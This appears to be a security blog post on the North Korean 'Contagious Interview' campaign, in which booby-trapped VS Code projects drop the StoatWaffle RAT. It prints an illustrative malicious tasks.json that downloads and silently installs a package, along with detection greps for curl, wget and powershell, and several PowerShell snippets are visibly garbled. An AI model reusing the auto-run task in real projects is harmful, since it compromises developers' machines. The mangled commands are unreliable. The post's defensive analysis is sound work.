North Korea’s “Contagious Interview” Weaponizes VS Code: How a Single Folder Opens Your System to StoatWaffle RAT + Video

Listen to this Post

Featured Image

Introduction:

A newly identified North Korean threat campaign, dubbed “Contagious Interview,” has shifted its focus from traditional phishing emails to a highly effective software supply chain attack targeting developers. By distributing malicious Visual Studio Code (VS Code) projects, the attackers leverage the IDE’s built-in automation features—specifically the `tasks.json` file—to execute a stager. This stager installs Node.js if it is missing and subsequently deploys the StoatWaffle stealer and Remote Access Trojan (RAT), turning a routine code review into a full-scale system compromise.

Learning Objectives:

  • Identify the specific VS Code project structures and configuration files (tasks.json, package.json) used in the Contagious Interview campaign.
  • Analyze the execution flow of the StoatWaffle malware, from initial folder opening to payload deployment.
  • Implement practical mitigation strategies, including static analysis techniques, sandboxing, and security configurations for development environments.

You Should Know:

1. Anatomy of the Malicious VS Code Project

This attack relies on the trust developers place in open-source repositories and shared projects. When a developer downloads and opens a folder in VS Code, the IDE automatically reads configuration files located in the `.vscode` directory. The threat actors exploit the `tasks.json` file, which defines automation tasks for the editor.

Step-by-step guide explaining what this does and how to use it:

Upon opening the folder, VS Code may prompt the user to “Allow” tasks defined in the workspace. If the user clicks “Allow” (or if the prompt is ignored due to user fatigue), the `tasks.json` file executes a command. In this campaign, the command typically checks for Node.js (node -v). If Node.js is missing, the script automatically downloads and installs it using package managers like `winget` (Windows) or `curl` (Linux/macOS) to ensure the environment is primed for the next stage.

// Malicious .vscode/tasks.json snippet
{
"version": "2.0.0",
"tasks": [
{
"label": "npm install",
"type": "shell",
"command": "node -v || (curl -fsSL https://nodejs.org/dist/v18.0.0/node-v18.0.0-x64.msi -o node.msi && msiexec /i node.msi /quiet) && npm install malicious-package"
}
]
}

Once Node.js is present, the script executes `npm install` on a pre-configured `package.json` that contains a malicious pre-install hook, or directly runs a JavaScript file that fetches the StoatWaffle payload from a remote C2 server.

2. StoatWaffle Payload Delivery and Persistence

StoatWaffle is a modular stealer and RAT. After the initial stager runs, it downloads the main payload from a remote server, often using obfuscated URLs or reputable cloud storage services to bypass network filters. The payload establishes persistence and begins exfiltration.

Step-by-step guide explaining what this does and how to use it (from a defender’s perspective):

To simulate or analyze the post-exploitation phase in a sandboxed environment:

  • Linux/macOS (Analysis): Use `strings` and `strace` to monitor the malicious script.
    strace -f -e trace=network,file,process node malicious.js 2> trace.log
    

  • Windows (Detection): Monitor process creation for unusual parent-child relationships. A suspicious chain is `code.exe` -> `cmd.exe` -> `node.exe` -> powershell.exe.

    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$<em>.Properties[bash].Value -like "node.exe"} | Select-Object TimeCreated, @{n='CommandLine';e={$</em>.Properties[bash].Value}}
    

  • Persistence Check: The malware often adds a scheduled task or registry run key.

    Check for scheduled tasks created recently
    Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-1)}
    Check user run keys
    reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    

3. Cross-Platform Exploitation Techniques

While the initial vector is VS Code, which is cross-platform, the payloads are tailored for the target OS. On Linux and macOS, the attackers use shell scripts, Python, or compiled binaries. The key is that the `tasks.json` execution is platform-agnostic.

Step-by-step guide explaining what this does and how to use it:

For a defender securing a cross-platform development environment, it is crucial to audit `.vscode` directories. Use a find command to recursively list all `tasks.json` files that contain suspicious keywords.

  • Linux/macOS Command:
    find /path/to/projects -name "tasks.json" -exec grep -l "curl|wget|npm install|powershell|msiexec" {} \;
    

  • Windows Command (PowerShell):

    Get-ChildItem -Path C:\Users\Documents\Projects -Recurse -Filter tasks.json | Select-String -Pattern "curl|wget|npm install|powershell|msiexec" | Select-Object Path
    

4. Configuration Hardening: Disabling VS Code Auto-Execution

The primary mitigation is to prevent VS Code from automatically running tasks without explicit user consent. While there is no global “disable all tasks” toggle, security settings can be adjusted to require manual activation.

Step-by-step guide explaining what this does and how to use it:

To harden VS Code against this attack vector:

  1. Open VS Code and navigate to File > Preferences > Settings (or Ctrl+,).

2. Search for “task”.

  1. Locate Tasks: Allow Automatic Tasks. Ensure this is unchecked. This prevents the editor from auto-running tasks on folder open.
  2. Additionally, set Tasks: Allow Prompt to “never” or enforce a strict modal prompt to ensure you are always aware when a task is about to execute.

Note: This configuration should be deployed via organization-wide settings sync or group policy for enterprise environments.

  1. Detection and Mitigation via Endpoint Detection and Response (EDR)

Modern EDR solutions can detect the behavioral patterns of the StoatWaffle infection chain. Analysts should look for specific indicators, such as `code.exe` spawning `cmd.exe` which then spawns `node.exe` to download executables from newly registered domains.

Step-by-step guide explaining what this does and how to use it:

If you suspect a compromise, initiate an investigation focusing on:

  • Network Connections: Look for connections made by `node.exe` or `code.exe` to suspicious IPs or domains.
    Linux: Check active connections
    ss -tulpn | grep node
    Windows: Check netstat
    netstat -ano | findstr :443
    
  • File System Artifacts: Hunt for new executables in temporary folders (%TEMP%, /tmp) that were created immediately following a VS Code task execution.
  • YARA Rule Integration: Deploy YARA rules to scan project directories for known StoatWaffle dropper scripts. A simple rule might look for `eval(atob(` or `var exec = require(‘child_process’).exec` within JavaScript files in `.vscode` or `node_modules` directories.

What Undercode Say:

  • Trust is the primary vulnerability: The Contagious Interview campaign exploits the inherent trust developers place in shared code and IDE automation, proving that supply chain attacks now target the toolchain itself, not just the final application.
  • Static analysis must extend to configurations: Security reviews of third-party projects must include `.vscode` and other IDE configuration directories. A `tasks.json` file is as dangerous as a malicious binary if executed automatically.
  • The convergence of IT and security is mandatory: This attack requires collaboration between IT (managing Node.js installations) and security (monitoring EDR alerts). Siloed teams will miss the behavioral anomalies that span process trees and network connections.

Prediction:

The use of legitimate developer tools (IDEs, package managers) as attack vectors will accelerate. We predict a rise in “Trojanized Workspace” campaigns where attackers publish malicious repositories on platforms like GitHub, targeting specific developer demographics (e.g., crypto, fintech). Future iterations will likely exploit other IDE automation features (e.g., VS Code extensions, launch configurations) and incorporate advanced evasion techniques, such as delaying payload activation until after the code has been reviewed, making them harder to distinguish from legitimate development activity. Organizations will be forced to implement “trusted workspace” policies and treat developer endpoints as high-value targets requiring the same level of scrutiny as production servers.

▶️ Related Video (74% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Hackermohitkumar North – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky